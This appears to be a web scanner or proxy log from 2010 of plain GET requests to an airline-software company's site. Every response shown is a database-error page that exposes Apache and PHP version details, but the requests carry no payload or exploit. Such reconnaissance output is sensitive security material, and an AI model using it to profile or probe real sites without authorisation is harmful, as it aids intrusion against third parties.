HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/sitemap/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/the_as_advantage/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/contact HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_distribution HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322158; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:52:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:27:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/downloads HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/downloads/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323007; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/downloads/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/downloads/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/ecommerce HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ecommerce/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A2%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3Bi%3A3%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323204; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fairline_reservations%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:01:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:59:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:59:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/more_customers HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323144; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/more_customers/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/more_revenue HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_revenue/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323140; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/more_revenue/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/my_list HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:58:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/my_list/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323024; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/news HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/news/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/news/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323005; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/airline_reservations/sabresonic_loyalty HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_loyalty/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323032; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
